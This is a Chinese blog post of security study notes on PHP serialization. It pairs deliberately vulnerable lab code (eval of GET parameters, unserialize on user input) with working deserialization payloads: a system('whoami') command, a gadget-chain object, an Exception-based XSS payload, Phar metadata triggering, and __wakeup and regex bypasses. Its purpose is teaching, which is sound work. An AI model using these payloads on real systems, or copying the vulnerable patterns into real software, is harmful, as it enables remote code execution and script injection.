PHP序列化和反序列化

最新推荐文章于 2024-03-15 09:46:31 发布
最新推荐文章于 2024-03-15 09:46:31 发布
阅读量1.1k 收藏 12
点赞数 5
分类专栏: 网络安全学习笔记 文章标签: 安全 php 网络安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44033675/article/details/116809651
版权

目录

简介

  在各类语言中,将对象的状态信息转换为可存储或可传输的过程就是序列化,序列化的逆过程就是便是序列化,主要是为了方便对象传输。
这里介绍php序列化和反序列化。

PHP基本类型的序列化

bool:b:value =>b:0
int:i:value=>i:1
str:s:length:“value”;=>s:4"aaaa"
array:a:<length>:{key:value pairs};=>a:{i:1;s:1:“a”}
object:O:<class_name_length>:
NULL:N

字母代表类型,数字代表类型字节数,value则是对应类型的值。
举例:

<?php
class test{
	public $a=false;
	public $b=3;
	public $c='hello';
	public $d=array(1,2,3,'hello');
	public $e=NULL;
}
$test = new test;
echo serialize($test);
?>

输出:

O:4:“test”:5:{s:1:“a”;b:0;s:1:“b”;i:3;s:1:“c”;s:5:“hello”;s:1:“d”;a:4:{i:0;i:1;i:1;i:2;i:2;i:3;i:3;s:5:“hello”;}s:1:“e”;N;}

PHP中的魔术方法

PHP中把以两个下划线__开头的方法称为魔术方法(Magic methods),是系统预定义的方法。
魔术方法的作用、方法名、使用参数列表和返回值都是规定好的,需要用户自己编写方法体内容。不需要调用
魔术方法:

__construct(),类的构造函数,当对象被创建时调用
__destruct(),类的析构函数,当对象被销毁时调用
__call(),在对象中调用一个不可访问方法时调用
__callStatic(),用静态方式中调用一个不可访问方法时调用
__get(),从不可访问的属性读取数据时调用
__set(),设置一个类的成员变量时调用
__isset(),当对不可访问属性调用isset()或empty()时调用
__unset(),当对不可访问属性调用unset()时被调用。
__sleep(),执行serialize()前时,先会调用这个函数
__wakeup(),执行unserialize()前时,先会调用这个函数
__toString(),类被当成字符串时使用时被调用(echo file_exists)
__invoke(),调用函数的方式调用一个对象时的回应方法
__set_state(),调用var_export()导出类时,此静态方法会被调用。
__clone(),当对象复制完成时调用
__autoload(),尝试加载未定义的类
__debugInfo(),打印所需调试信息

利用序列化获取敏感信息

常见反序列

1、

<?php
	class test{
		function __destruct(){
			echo $_GET['cmd'];
			eval($_GET['cmd']);
			#system($_GET['cmd']);
		}
	}
	#eval('system("");');
	unserialize($_GET['u']);
?>

构造payload:

u=O:4:“test”:0:{}&cmd=system(“whoami”);

可以爆出一些信息
system(“whoami”);laptop-uopqa8nr\Íõçù

2、通过其他类的方法利用

<?php
	class test{
		protected $ClassObj;
		function __construct(){
			$this->ClassObj=new normal;
		}
		function __destruct(){
			$this->ClassObj->action();
		}
	}
	class normal{
		function action(){
			echo "hello";
		}
	}
	class evil{
		private $data;
		function action(){
			eval($this->data);
		}
	}
	echo $_GET['cmd'];
	$c=unserialize($_GET['cmd']);
?>

通过代码分析可以将normal换成evil类,析构时会调用evil的action方法。
因为ClassObj类是保护型,存在“%00*%00”来表示它,在构造payload时要通过urlencode编码避免%00缺失。

<?php
	class test{
		protected $ClassObj;
		function __construct(){
			$this->ClassObj=new normal;
		}
		function __destruct(){
			$this->ClassObj->action();
		}
	}
	class normal{
		function action(){
			echo "hello";
		}
	}
	class evil{
		private $data;
		function action(){
			eval($this->data);
		}
	}
	echo $_GET['cmd'];
	$c=unserialize($_GET['cmd']);
	#echo $c;
	#$test=new test1;
	#echo serialize($test);
?>

payload:

O%3A4%3A"test"%3A1%3A%7Bs%3A11%3A"%00%2A%00ClassObj"%3BO%3A4%3A"evil"%3A1%3A%7Bs%3A10%3A"%00evil%00data"%3Bs%3A10%3A"phpinfo%28%29%3B"%3B%7D%7D

在这里插入图片描述

原生类利用

SoapClient::__call方法(PHP5/7)

详细见点这

__toString(PHP5/7)

<?php
	echo unserialize($_REQUEST['u']);
?>

构造Exploit

<?php
	echo urlencode(serialize(new Exception("<script>alter(/xss/)</script>")));
?>

O%3A9%3A%22Exception%22%3A6%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A29%3A%22%3Cscript%3Ealter%28%2Fxss%2F%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A39%3A%22C%3A%5Cphpstudy_pro%5CWWW%5CPHP%5Cserial%5Ctest.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A3%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7D%7D

主要利用了Exception类对错误消息没有过滤,导致最终反序列化后输出内容在网页中造成XSS。

__construct

配合原生类SimpleXMLElement类
待补充。。。

Phar反序列化

详细见
我们一般利用反序列漏洞,一般都是借助unserialize()函数,不过随着人们安全的意识的提高这种漏洞利用越来越来难了。Phar反序列化这种方法可以在不使用unserialize()函数的情况下触发PHP反序列化漏洞。漏洞触发是利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息。

一、PHAR简介

PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件,在PHP 5.3 或更高版本中默认开启,这个特性使得
PHP也可以像 Java 一样方便地实现应用程序打包和组件化。一个应用程序可以打成一个 Phar 包,直接放到 PHP-FPM 中运行。

二. PHAR文件结构
Phar文件主要包含三至四个部分:

a stub stub的基本结构:xxx<?php xxx;__HALT_COMPILER();?>,前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件。

a manifest describing the contents

Phar文件中被压缩的文件的一些信息,其中Meta-data部分的信息会以序列化的形式储存,这里就是漏洞利用的关键点 生成phar文件
在这里插入图片描述

the file contents 被压缩的文件内容,在没有特殊要求的情况下,这个被压缩的文件内容可以随便写的,因为我们利用这个漏洞主要是为了触发它的反序列化
在这里插入图片描述

a signature for verifying Phar integrity 签名格式
在这里插入图片描述

构造一个phar文件
根据文件结构我们来自己构建一个phar文件,php内置了一个Phar类来处理相关操作
注意:要将php.ini中的phar.readonly选项设置为Off,否则无法生成phar文件。

[Phar]
; http://php.net/phar.readonly
phar.readonly = Off

; http://php.net/phar.require-hash
;phar.require_hash = On

;phar.cache_list =

<?php
    class TestObject {
    }
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new TestObject();
    $o -> data='hackhack';
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

在这里插入图片描述
可以明显的看到meta-data是以序列化的形式存储的。
有序列化数据必然会有反序列化操作,php一大部分的文件系统函数在通过phar://伪协议解析phar文件时,都会将meta-data进行反序列化,测试后受影响的函数如下:
在这里插入图片描述

<?php
class TestObject{
    function __destruct()
    {
        echo $this -> data;   // TODO: Implement __destruct() method.
    }
}
include('phar://phar.phar');
?>

可以看到成功触发了反序列化
在这里插入图片描述

小技巧

__wakeup失效

影响版本PHP5-5.6.25 PHP7-7.0.10
原因:当属性个数不正确时,process_nested_data函数会返回为0,导致call_user_function_ex函数不会执行,则PHP中就不会调用__wakeup().
方法:构造属性不一致的序列化对象字符串可对__wakeup()绕过。

bypass反序列化正则

当执行反序列化时,使用正则/[oc]:\d+:/i进行拦截,主要拦截了O:4:"demo":1:{s:5:"demoa";a:0:{}}
绕过O:+4:"demo":1:{s:5:"demoa";a:0:{}}+号跳转,表达数字

反序列化字符逃逸

构造payload的长度的无效字符串,进而实现payload修改属性值。

session反序列化

Session处理器:php、php_binary、php_serialize、wddx
待补充

PHP引用

Exception 绕过

解析一部分,构造正确类名,进而调用析构函数,绕过抛出异常。

1ance.
关注
  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php json与xml序列化/反序列化
10-26
在WEB开发php对象的序列化反序列化经常使用,比较主流的有json格式与xml格式的序列化反序列化。今天我们就来看看是如何用的。
详解PHP序列化反序列化原理
10-18
本篇文章给大家分享了下PHP反序列化漏洞系列之PHP序列化反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
Aura.Marshal: 简洁高效的 PHP 对象序列化反序列化
最新发布
gitblog_00064的博客
03-15 302
Aura.Marshal: 简洁高效的 PHP 对象序列化反序列化库 Aura.Marshal 是一个轻量级的 PHP 库,用于在 PHP 对象和多种数据类型之间进行序列化反序列化操作。与其他序列化库不同的是,Aura.Marshal 提供了高度可定制化的选项,允许开发人员根据需要调整序列化行为。 项目简介 Aura.Marshal 是一个易于使用的对象序列化反序列化库,支持多种数据格式,包...
PHP序列化反序列化(基础篇)
errorr0
03-10 2454
最最最基础的序列化反序列化
PHP序列化反序列化-总结实战
qq_45836485的博客
04-15 420
PHP序列化反序列化 摘要 什么是序列化反序列化 PHP序列化反序列化 实战案例 实在案例2 什么是序列化反序列化 序列化反序列化是面向对象语言特有的表示形式 序列化 将变量转换为可保存或传输的字符串的过程 反序列化 把字符串转化为原来的变量 PHP序列化反序列化 PHP序列化反序列化方法主要有四种 1.serialize/unserialize 这两个是序列化反序列化PH...
PHP序列化反序列化
dydydt的博客
07-11 870
序列化反序列化
PHP的序列化反序列化
一颗小白菜的博客
08-17 536
PHP程序执行结束以后会将文件的变量和内容释放掉, 如果一个程序想要的调用之前程序的变量,但是之前的程序已经执行完毕,所有的变量和内容都被释放,那该如何操作呢?这时候就可以通过序列化反序列化保存程序的对象,给其他程序使用。php序列化可以将对象转换成字符串,但只序列化属性,不序列化方法。unserialize()函数的变量可控,php文件存在可利用的类,类有魔法函数。[网鼎杯 2020 青龙组]AreUSerialz(BUUCTF)​PHP序列化反序列化函数达到序列化反序列化的目的。...
PHP序列化反序列化入门
2301_77342543的博客
07-13 1821
serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象通过序列化反序列化我们可以很方便的在PHP进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击php//实例化一个对象?返回结果s:4:"name";s:3:"age";s:2:"18";O代表对象,这里是序列化的一个对象,要序列化数组的就用A6表示的是类的长度sunset表示对是类名。
序列化反序列化PHP
m0_61869253的博客
08-23 80
序列化:把对象转换为字节序列的过程称为对象的序列化反序列化:把字节序列恢复为对象的过程称为对象的反序列化。对象的持久化(将对象内容保存到数据库或文件)远程数据传输(将对象发送给其他计算机系统)序列化序列化主要解决的是数据的一致性问题。简单来说,就是输入数据与输出数据是一样的。对于数据的本地持久化,只需要将数据转换为字符串进行保存即可是实现,但对于远程的数据传输,由于操作系统,硬件等差异,会出现内存大小端,内存对齐等问题,导致接收端无法正确解析数据,为了解决这种问题。
PHP 序列化反序列化函数实例详解
12-20
序列化反序列化 把复杂的数据类型压缩到一个字符串 serialize() 把变量和它们的值编码成文本形式 unserialize() 恢复原先变量  1.创建一个$arr数组用于储存用户基本信息,并在浏览器输出查看结果; $arr=...
PHP 序列化反序列化
05-01
NULL 博文链接:https://onestopweb.iteye.com/blog/2409085
WEB入门——PHP反序列化漏洞
HasntStartIsOver的博客
06-08 284
PHP应用序列化反序列化一般用做缓存,比如session缓存,cookie等。二进制格式字节数组json字符串xml字符串。
php序列化反序列化
qq_63501912的博客
02-07 833
php序列化反序列化
PHP序列化,反序列化
kuzemax的博客
08-07 754
反序列化常用于上层语言构造特定调用链的方法,与二进制利用的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN的ROP,有时候反序列化一个对象时,由它调用的__wakeup()又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。
PHPPHP 序列化反序列化
边扯边淡
11-18 165
起序:做 Web 题的遇到的,总结总结。 一、概述 1、概念 把对象转换为字节序列的过程称为对象的序列化; 把字节序列恢复为对象的过程称为对象的反序列化。 1、序列化 引用官方术语就是 序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。 应用就是将 对象、文件、数据 等多种不同的格式,由于很难统一 传输和保存,经过序列化之后就都是字节流了,就可以进行将这通用的格式 传输和保存。 2、反序列化 引用官方术语就是 反序列化 (UnSerialization)是将
php7反序列化,学习php序列化反序列化
weixin_42320332的博客
03-26 145
学习php序列化反序列化通过学长给的两个包含相关知识点的链接学习了相关的知识点自己在B站搜索相关内容也找到了相关的视频学习先来讲讲学到了哪几个知识点和一些要注意的点序列化class test{private $a;protected $b;public $c;var $d;static $f;function __construct(){$this->a=$this->b=$thi...
PHP序列化反序列化绕过
qq_46041723的博客
11-18 2965
序列化反序列化及绕过前言序列化反序列化序列化反序列化反序列化绕过ctf题目实例 前言 本菜鸡本着菜死人不偿命的觉悟,接着迈向了ctf的世界。 废话不多说,今天来谈一下PHP序列化反序列化还有一些绕过姿势 序列化反序列化 序列化PHP里面存在一个serialize方法来实现序列化功能。 Serializable { /* 方法 */ abstract public serialize ( ) : string abstract public unserialize ( string $seria
php序列化反序列化
07-29
PHP序列化是将PHP对象转换为字符串的过程,以便在存储或传输时使用。序列化后的字符串可以通过反序列化操作重新还原为原始的PHP对象。\[1\] 在PHP,可以使用serialize()函数将对象序列化为字符串,然后使用unserialize()函数将字符串反序列化为对象。这样可以方便地在不同的环境传递和存储对象数据。 然而,反序列化操作也存在安全风险。恶意用户可以构造特定的序列化字符串,以触发PHP反序列化漏洞,导致代码执行或敏感信息泄露。因此,在进行反序列化操作时,需要谨慎处理输入数据,验证和过滤不可信的序列化字符串。 除了使用serialize()和unserialize()函数,还可以利用一些特殊的方式来触发PHP反序列化漏洞。例如,通过Phar反序列化,可以在不使用unserialize()函数的情况下触发PHP反序列化漏洞。当使用phar://伪协议读取phar文件时,会自动反序列化meta-data存储的信息,从而导致漏洞触发。\[2\]\[3\] 因此,在开发和使用PHP应用程序时,需要注意对序列化反序列化操作进行安全处理,避免潜在的安全风险。这包括对输入数据进行验证和过滤,限制反序列化操作的权限,以及及时更新和修复可能存在的漏洞。 #### 引用[.reference_title] - *1* *2* *3* [PHP序列化反序列化](https://blog.csdn.net/weixin_44033675/article/details/116809651)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值